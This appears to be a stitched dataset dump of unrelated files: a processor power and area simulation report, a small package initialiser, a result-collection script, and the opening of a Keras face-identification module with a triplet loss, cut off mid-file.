'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55376,
'Load Store Unit/Runtime Dynamic': 0.197526,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219121,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0438239,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.00777668,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00817479,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0645735,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.012062,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.234041,
'Memory Management Unit/Runtime Dynamic': 0.0202368,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6565,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00247023,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0281876,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0306579,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.32178,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0542721,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0875389,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0441867,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.185998,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0620727,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94416,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00227642,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0164617,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0168355,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0164617,
'Execution Unit/Register Files/Runtime Dynamic': 0.0191119,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0346801,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0973057,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.910481,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000553131,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000553131,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000486817,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000191212,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000241843,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00183492,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00512327,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0161844,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.02946,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.073102,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0549695,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.29794,
'Instruction Fetch Unit/Runtime Dynamic': 0.151214,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0266069,
'L2/Runtime Dynamic': 0.00833448,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51242,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.145492,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.00890668,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00890669,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55448,
'Load Store Unit/Runtime Dynamic': 0.198323,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219623,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0439247,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.00779451,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00819402,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0640083,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0119843,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.233507,
'Memory Management Unit/Runtime Dynamic': 0.0201783,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6462,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00244861,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0279431,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0303917,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.31892,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.491265765435208,
'Runtime Dynamic': 6.491265765435208,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.307945,
'Runtime Dynamic': 0.0997527,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 55.2759,
'Peak Power': 88.3881,
'Runtime Dynamic': 6.57742,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 54.968,
'Total Cores/Runtime Dynamic': 6.47767,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.307945,
'Total L3s/Runtime Dynamic': 0.0997527,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
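A minimal sketch, assuming the nested report above is available as a string bound to a hypothetical variable report_text; the keys and values used below are taken directly from the entries shown above.

import ast

stats = ast.literal_eval(report_text)       # parse the dict literal above (report_text is an assumed name)
print(stats['Processor']['Peak Power'])     # 88.3881
print(stats['DRAM']['Runtime Dynamic'])     # 6.491265765435208
print(stats['L3'][0]['Area'])               # 61.9075; 'L3' is a list with one entry per cache instance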
| 75.068928
| 124
| 0.682101
| 8,082
| 68,613
| 5.78483
| 0.064959
| 0.123543
| 0.112934
| 0.093427
| 0.940966
| 0.933673
| 0.92069
| 0.895771
| 0.867324
| 0.848459
| 0
| 0.132013
| 0.224316
| 68,613
| 914
| 125
| 75.068928
| 0.746439
| 0
| 0
| 0.664114
| 0
| 0
| 0.657373
| 0.048095
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a888099df09f7dd54d046c8dd70b4c083d743552
| 174
|
py
|
Python
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 8
|
2018-03-29T08:36:10.000Z
|
2022-02-07T12:48:46.000Z
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 2
|
2017-11-06T18:32:02.000Z
|
2017-11-06T20:23:39.000Z
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 2
|
2017-11-10T12:30:27.000Z
|
2019-04-15T16:32:25.000Z
|
from opengrid_dev.config import *
from opengrid_dev.library import *
from opengrid_dev.recipes import *
from pint import UnitRegistry
ureg = UnitRegistry()
Q_ = ureg.Quantity
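A brief usage sketch of the ureg/Q_ objects this __init__.py exposes, relying only on documented pint behaviour; the quantities below are hypothetical examples, not part of the package.

from pint import UnitRegistry

ureg = UnitRegistry()
Q_ = ureg.Quantity

energy = Q_(1.5, 'kWh')             # build a unit-aware quantity
print(energy.to('joule'))           # 5400000.0 joule
print(Q_(230, 'V') * Q_(10, 'A'))   # 2300 volt * ampere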
| 29
| 34
| 0.816092
| 24
| 174
| 5.75
| 0.5
| 0.26087
| 0.326087
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 174
| 6
| 35
| 29
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a8d2327f440a2074ee3ff22ab6189caf4762ee84
| 1,142
|
py
|
Python
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 11
|
2019-10-30T12:41:56.000Z
|
2021-11-17T02:45:52.000Z
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 2
|
2020-12-18T00:02:54.000Z
|
2021-11-19T02:33:37.000Z
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 3
|
2020-03-09T06:25:20.000Z
|
2021-08-02T11:36:46.000Z
|
import sys, os

BASE_DIR = os.path.abspath(os.path.dirname(__file__))


def collect_result():
    """Collect the last result line of [weekly_result_METRICS_IGNORE_LENGTH.txt] from each dup directory.
    """
    dup = int(sys.argv[2])
    bd = sys.argv[1]
    out_file = open('RESULT_COLLECTOR_{}.txt'.format(bd), 'w')
    for i in range(dup):
        result_file = os.path.join(BASE_DIR, '{}/dup_{}/weekly_result_METRICS_IGNORE_LENGTH.txt'.format(bd, i))
        with open(result_file, 'r') as f:
            for line in f:
                pass  # Iterate through the file; 'line' ends up holding its last line.
            out_file.write(line)
    out_file.close()


def collect_result2():
    """Collect the last result line of [weekly_result_METRICS_IGNORE_IEDB_ID_AND_LENGTH.txt] from each dup directory.
    """
    dup = int(sys.argv[2])
    bd = sys.argv[1]
    out_file = open('RESULT_COLLECTOR_IGNORE_IEDB_{}.txt'.format(bd), 'w')
    for i in range(dup):
        result_file = os.path.join(BASE_DIR, '{}/dup_{}/weekly_result_METRICS_IGNORE_IEDB_ID_AND_LENGTH.txt'.format(bd, i))
        with open(result_file, 'r') as f:
            for line in f:
                pass  # Iterate through the file; 'line' ends up holding its last line.
            out_file.write(line)
    out_file.close()


if __name__ == "__main__":
    collect_result()
    collect_result2()
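A short usage sketch, assuming the dup_* folders live under the same directory as the script; the benchmark name below is a placeholder.

# Hypothetical invocation:
#   python result_collector.py <benchmark_dir> <num_dups>
# e.g. `python result_collector.py blind_test 5` reads
#   blind_test/dup_0 ... blind_test/dup_4/weekly_result_METRICS_IGNORE_LENGTH.txt
# and writes each file's last line into RESULT_COLLECTOR_blind_test.txt.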
| 30.052632
| 123
| 0.631349
| 167
| 1,142
| 3.976048
| 0.287425
| 0.036145
| 0.114458
| 0.150602
| 0.807229
| 0.807229
| 0.807229
| 0.718373
| 0.718373
| 0.653614
| 0
| 0.006849
| 0.232925
| 1,142
| 37
| 124
| 30.864865
| 0.751142
| 0.138354
| 0
| 0.56
| 0
| 0
| 0.18595
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.08
| 0.04
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
767b0c987f595bd7a221810e477d4c18edefcda0
| 77,806
|
py
|
Python
|
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | 4
|
2019-06-22T15:56:54.000Z
|
2020-12-03T07:41:15.000Z
|
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | null | null | null |
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | 1
|
2021-09-14T03:53:20.000Z
|
2021-09-14T03:53:20.000Z
|
'''
MIT License
Copyright (c) 2019 Inwoo Chung
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
Created on Apr 9, 2019
@author: Inwoo Chung (gutomitai@gmail.com)
'''
import os
import glob
import argparse
import time
import pickle
import platform
import shutil
from random import shuffle
import json
import numpy as np
import pandas as pd
import cv2 as cv
from skimage.io import imread, imsave
from scipy.linalg import norm
import h5py
import matplotlib.pyplot as plt
import ipyparallel as ipp
from keras.models import Model, load_model
from keras.layers import Input, Dense, Lambda, ZeroPadding2D
from keras.layers import LeakyReLU, Flatten, Concatenate, Reshape, ReLU
from keras.layers import Conv2DTranspose, BatchNormalization
from keras.layers.merge import add, subtract
from keras.utils import multi_gpu_model
from keras.utils.data_utils import Sequence
import keras.backend as K
from keras import optimizers
from keras.engine.input_layer import InputLayer
from yolov3_detect import make_yolov3_model, BoundBox, WeightReader, draw_boxes_v3
from face_detection import FaceDetector
# Constants.
DEBUG = True
ALPHA = 0.2
RESOURCE_TYPE_UCCS = 'uccs'
RESOURCE_TYPE_VGGFACE2 = 'vggface2'
def triplet_loss(y_true, y_pred):
    # y_pred concatenates the anchor (x[:, 0:64]), positive (x[:, 64:128]) and negative
    # (x[:, 128:192]) facial embeddings; penalize triplets where the anchor-positive distance
    # is not smaller than the anchor-negative distance by at least the ALPHA margin.
    x = y_pred
    return K.mean(K.maximum(K.sqrt(K.sum(K.pow(x[:, 0:64] - x[:, 64:128], 2.0), axis=-1))
                            - K.sqrt(K.sum(K.pow(x[:, 0:64] - x[:, 128:192], 2.0), axis=-1)) + ALPHA, 0.))
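# Illustrative sketch (hypothetical helper, assuming 64-dimensional embeddings as in the slices
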